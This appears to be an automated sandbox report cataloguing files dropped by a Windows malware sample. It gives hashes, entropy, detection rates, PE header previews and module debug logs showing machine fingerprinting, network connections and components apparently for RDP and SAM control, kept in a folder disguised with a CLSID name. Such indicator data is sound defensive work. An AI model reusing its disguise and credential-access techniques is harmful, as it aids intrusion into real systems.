                                                                                                                SSDEEP:12:mLlNMRB03f+U1ksM4farxGIPpiWmlA+KRNZgR24KUm:mLlNk2vV1ksxUG4YWmlNKnZgR26m
                                                                                                                MD5:9CD180D80699E7CB8578BBA0FA289690
                                                                                                                SHA1:F4C69C0801E0467855904EDEE6AF56248724777E
                                                                                                                SHA-256:CB7F579F8CA15F4A2D20D412F966BAB24604B3D02846CAADB92D5625647B214C
                                                                                                                SHA-512:9D5860D5E1F25B442E7DBCB7FECB3A09FDD97ED811A9C81B02F965DD466537FF809EEA4EEB28E67665D5B0D459698EF4A14DC01F3746DAAE9D907E6762D8398D
                                                                                                                Malicious:false
                                                                                                                Preview:m.Y...2@!`..3..5N.u'6.Q..j.....T.44...L...B......A../.V.a'.....n].........2.$.`x.=.0...\%.n..\@x..DY..H..).)..pJ...L..........3"..8..O.k0......|9..X..K.]..I..q.>.M.h.71,.b.x.Y..l.H..<......"......b.x=.{.6..;.F.Et.YW.&...E.w.&..!.sH[....^.e......... T..W...u.......U.Z.z.Q...\.d....6..s....4......S...bA...<.... Q.&..x..x..h......~..W.Y.....qo....%..$.3......C.K5.'.0A.7.H...N;.....R...l..B.......h.J.4....*......&8?....../..-.v._.x...%.:..L5[k...#P.M......Z...).=0.h>M.qu.}.x-"..O...K.Zf
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):512
                                                                                                                Entropy (8bit):7.604254884953776
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:E+qstflmKO28zDVf0bmc/XyEptiwhcPSv793C:E+Ptfl8VzRAmoyEpDhBv7JC
                                                                                                                MD5:9749178C9973D3FD118A662470950C0C
                                                                                                                SHA1:4B5016E3860F19DE99C394F83CA1409EE54666FD
                                                                                                                SHA-256:26029385C0E148D214341548A179EEFF9392D11CC84C27F3027187972C5F809C
                                                                                                                SHA-512:2DD99DB8235B547395141A515F9856C66B9725A3AE50F827641D28DF8CF9648752E03A10F7D3624B95EB68F960A8458D33425AC3B80A4181F98D54FD611537C5
                                                                                                                Malicious:false
                                                                                                                Preview:..X.......j.zPU.kC......HvU3.ib j.I:4..T$..?....]h.B....F.IL..m.1p2K.....4o.ry...|.........0Z}.g.....!nH.=K_..~._o...3vvj,0G..$..m...3\jg.l...74.8...pZ6^.....@..p.)fCB.W.V....u....Z.. ..u.0!....pH@..^$2\...(.......a.R...~4.R..k..d..a..O.,B.4...z.._>.r"....=..H>.6@.`:"...^A.t....g...Z....Q.mN.O;.'.&!&.R.sR..{.5.S....R........=.^.(..j.~..4.w.]...A.d.t...,X.....g$1{{*/...'t.....!..~0.),. ....R3.Cd.7......V..........Z.S..)w.y.kEX......y.'..)N.....Cl...6....P......G.... <=..$..E..8N
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):80
                                                                                                                Entropy (8bit):5.84692809488736
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:J+uuHNto9HXKEDsecLN:wBtm93zsx
                                                                                                                MD5:714EF232860E57ED99E1E8CB8A0318A4
                                                                                                                SHA1:16942B55223C0D76B439BF80DE69CF01F2F5DFED
                                                                                                                SHA-256:63B02E858C4FAA5AA348A15BABC90DA211AB251FB305739E7337BDAC43B7E5B0
                                                                                                                SHA-512:5AE602529BADFEB3DCC994D086CE8EE0C3681AA0CCB2C2DCAFFD4E9804177BAD89B4E7645647075F293620150A2C413B8B5BA1F9007D2028F56308544E0AB5AC
                                                                                                                Malicious:false
                                                                                                                Preview:.........'_..a...Z..<.;? ...tqh_.$.h..Q.-...mk&...$..y..Q.c\....O2.&r.w.y..
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):721
                                                                                                                Entropy (8bit):6.562107366925408
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:9DRoYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgv0Oys01ro8J7:JRfrPrPrPrPrPrPrPrPrPrvLQ5aqHXKQ
                                                                                                                MD5:0B1FCB5DE4677EF1FB109C4A5C422452
                                                                                                                SHA1:EFB917C1F241499F92D2157CCE191955D4BEFF18
                                                                                                                SHA-256:9263B2B560E838198CC3423EACB1916699B609B4E8D88AC1B0BBD1C4EB6C43E0
                                                                                                                SHA-512:CA85568C9206803759D2501BD590F0487B7B8B00268BFA3725F85E5EF806191A07C2484652F9003259C83A7B5FACC81BA46A3EB85FEF3E10907565AFF6D5103A
                                                                                                                Malicious:false
                                                                                                                Preview:...e..,.*.!(....z.h.=..7{Y...:l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._hl....7...e.sr...x...5u|...kW...........|LP............NTCP2.@.caps=.4;.s=,u9oM7dcPiNoTJ1-D~WHc0d2FWoOVPKk7PyCvxogJdHE=;.v=.2;..........SSU2.q.caps=.4;.i=,qcu6pvksYwKe0An4BK8kTsWbuIBgQYt1alJN0T4QqN8=;.s=,18h9sQIfONo6BXQ0wdNJ-i86-camylCsqKKABASImCg=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;IT.........i.Np.O....,|.q.d&.t..!t..i_.D.2...s.ru..S...3~..:.$.
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):455
                                                                                                                Entropy (8bit):6.038835783469648
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:9DRoYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgrkYIgv0N8o3:JRfrPrPrPrPrPrPrPrPrPrv48o3
                                                                                                                MD5:AE133D521904C0EF0F151D96793317FB
                                                                                                                SHA1:802A1D85C8ED221417A8FD8D31DC9D8E76B02E14
                                                                                                                SHA-256:BC2B5862F5B23264EC82D50893C139FC392920B769E38BFEEBA8374C7604A765
                                                                                                                SHA-512:B4A6B8A3230B02B03EF8CC7F27DE48717D5EE5D49626E8B6FA0B7BCE84DE14E0C3B07295CAEECE934A73F6B7DCF814246D56C5F318521C27C28872F99C6876D4
                                                                                                                Malicious:false
                                                                                                                Preview:...e..,.*.!(....z.h.=..7{Y...:l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._l"..}....lV6=......=.r...p.S._hl....7...e.sr...x...5u|...kW...............O.....9.....0.......A%#wgH.X.../.>.H.FAX.o.a.N.t..Y\
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):96
                                                                                                                Entropy (8bit):6.306265755906958
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:nUyZ21aDJf4OnROeEuDkM2iXu8pr6n:nU4SOIeO8pr6
                                                                                                                MD5:E8DAC512D88C81A631B8F1AB4293F2F4
                                                                                                                SHA1:B0B4B716E155FD191E1708CC30189DE34ED5E8BC
                                                                                                                SHA-256:0B947CDDF832857F129EB6585E020828CBB931F3CB479EAC88A803E46344FD45
                                                                                                                SHA-512:EE98333D3BAF1FD3A328E56E8DCAEC8AA35C37F97124A0B778AE5CDF647D791BA80161F7AE39B56C844FE40E6F93F15F92AE94ADF3BBCAB8C188B28BCF658839
                                                                                                                Malicious:false
                                                                                                                Preview:..}...8.:.t4..I./:...P........(.?#Hw5'.~K............M!.r.ja.d....,c.......$N...`A.ujRM.>...
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):9146880
                                                                                                                Entropy (8bit):6.674868432808522
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                                                                                                MD5:676064A5CC4729E609539F9C9BD9D427
                                                                                                                SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                                                                                                SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                                                                                                SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):89088
                                                                                                                Entropy (8bit):6.229509810228039
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:uICj06A88ADD9QIlXlQhnJqI1I5npfinMC0eH:xCj06A8J1/sJa5pfinMC0e
                                                                                                                MD5:4E320E2F46342D6D4657D2ADBF1F22D0
                                                                                                                SHA1:A5ACFE6397DFFC61D243206885C389EA05428755
                                                                                                                SHA-256:7D4A26158F41DE0BFD7E76D99A474785957A67F7B53EE8AD376D69ABC6E33CC8
                                                                                                                SHA-512:E8E044FD17B36D188BB5EE8E5F7BFC9AECC01AB17E954D6996B900BC60D6D57AFD782C7E01DF7CC76A84E04CE16F77FE882F2D86E5113F25C1C3D385CFAE37A5
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....X.................@....................................\.....`... .................................................P............`..X...........................................`B..(....................................................text...............................`..`.data...............................@....rdata...P.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4672
                                                                                                                Entropy (8bit):5.34667923568992
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:idHwWYJ9VvyHzHH0Hf0HaSH8mHu5SHSgdQpmHSm5SHTmHOn5SHHSHBMKmHX5SH8l:AziTqTn0/06SHO5SiAz5SKc5SnSA35SG
                                                                                                                MD5:EC7754208DC38D9E9B7EC03FACE04697
                                                                                                                SHA1:5E9614D8872F22CF32AE2F1F9EC99192B6F18476
                                                                                                                SHA-256:A88C3D9FD4BFD447453D3966C26ABE3DB520B7140EC62AABE35D7D44572637D1
                                                                                                                SHA-512:704D3517DB7EC1A468C553B5DC0000EACC3156F23722C39CE45EB6EFCF3E2C93DF5FBDFD345DD77B6439AF724EED160303F6395F1E56BC703C58586679C1422B
                                                                                                                Malicious:false
                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[E] (package_install) -> Failed(pkg_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,tgt_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,err=00000003)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):105984
                                                                                                                Entropy (8bit):6.2884725801282775
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
                                                                                                                MD5:91A0DD29773FBFB7112C5FCFF1873C13
                                                                                                                SHA1:E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
                                                                                                                SHA-256:AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
                                                                                                                SHA-512:F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1167
                                                                                                                Entropy (8bit):5.503364029510054
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:CFAGHr5lGyclY7Gfy6BgT7cRE9FLxJ7J10ERq4XYwHeAOp:CFdHr54yclDYcm9FLnvOyneD
                                                                                                                MD5:75E9CBA42A12E9E69A9E76898E201A20
                                                                                                                SHA1:D181F0716A3C415CD2BFEF3FD7D77D765787BC67
                                                                                                                SHA-256:2505BDA1C8A6B657B169A199C1C1078E24147F10E2D509D9D7CC92AD92440E3F
                                                                                                                SHA-512:5AA21B37B35AC20031872435021D8B55EE55796A7F1ED351B1B1555ABBE3533BE11AAC4B53CE6FAC29947C2482FC88FBCC39A71707B213B21B9FDB234F0CE5AF
                                                                                                                Malicious:false
                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe11ec9d36)..[I] (tcp_connect) -> Done(sock=0x39c,host=7
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):129024
                                                                                                                Entropy (8bit):6.313152038164236
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
                                                                                                                MD5:C89542ABA45CE1084760AE8DE6EAE09E
                                                                                                                SHA1:603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
                                                                                                                SHA-256:1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
                                                                                                                SHA-512:60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1354
                                                                                                                Entropy (8bit):5.501517921965703
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:CFAGH75lGyclY7Gfy6BgT7cRE9FLxJ7J10dk1RDocXYWYcRAENmMeAOp:CFdH754yclDYcm9FLnv/icLMMeD
                                                                                                                MD5:499A04EBE3C94D77D89E75C6CD5BF99E
                                                                                                                SHA1:8F3D9D15387DF4B793E65D0BDEDEF7C83579C798
                                                                                                                SHA-256:482EA17618A25BC59BB0E0B28D73AD90C61E0F5F28B1BEC711D809917B3ADB9A
                                                                                                                SHA-512:0D743E3884A56FBEA42F8B9C55B3917ADD3E83ECD7B28748C1823F101102C877B95C780E7F6363C7F73368C9C39849BDA61E72EA1E2327EE6ED64ED92D8FBA7A
                                                                                                                Malicious:false
                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe11bd
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):37376
                                                                                                                Entropy (8bit):5.7181012847214445
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                                                                MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                                                                SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                                                                SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                                                                SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):115712
                                                                                                                Entropy (8bit):6.277217301921545
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
                                                                                                                MD5:D0F0423AEEE6B6FF6754D860603D46D0
                                                                                                                SHA1:A06F3B9605B3398BA68154DA39ADF26DDEE41743
                                                                                                                SHA-256:81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
                                                                                                                SHA-512:C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1926
                                                                                                                Entropy (8bit):5.480111417919406
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:CFdHr+54yclDYcm9FLnvHf5ZR5+sR5HR5ikfP5OKXbeD:idHxNYJ9Vv8D
                                                                                                                MD5:4C26C88B30F253D89B0839E67F813835
                                                                                                                SHA1:7B689FF45EEB685F796F36748288CB1639D63496
                                                                                                                SHA-256:C902DFA1B8835B80123D458DA99171AFC2F3345B0007454F6AF7D8895F0AB733
                                                                                                                SHA-512:4DA9B59AA336A742AEDCFEC64385476A9A6D025F16D773AFC3F2DDA83EBBA21152AF0901271A55347667DA501677DBBE16D55431C02EE6AAE2120F4034AEDF1B
                                                                                                                Malicious:false
                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=88d241f9)..[I] (sys_init) -> Done(sys_uid=c76a8f0888d241f9,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe1177e1cc)..[I] (tcp_connect) -
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):91136
                                                                                                                Entropy (8bit):6.2290767543196575
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
                                                                                                                MD5:4C086C8F48C4D0F8C20410E60340AEC9
                                                                                                                SHA1:77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
                                                                                                                SHA-256:0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
                                                                                                                SHA-512:CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                File Type:Generic INItialization configuration [SLPolicy]
                                                                                                                Category:dropped
                                                                                                                Size (bytes):441513
                                                                                                                Entropy (8bit):5.449545529389614
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
                                                                                                                MD5:5FCB4B6362E04A8D1C6ECD33AD246FB9
                                                                                                                SHA1:E198D3E81C4B8527451133BCEAFA799D2115A8BB
                                                                                                                SHA-256:060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
                                                                                                                SHA-512:B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
                                                                                                                Malicious:false
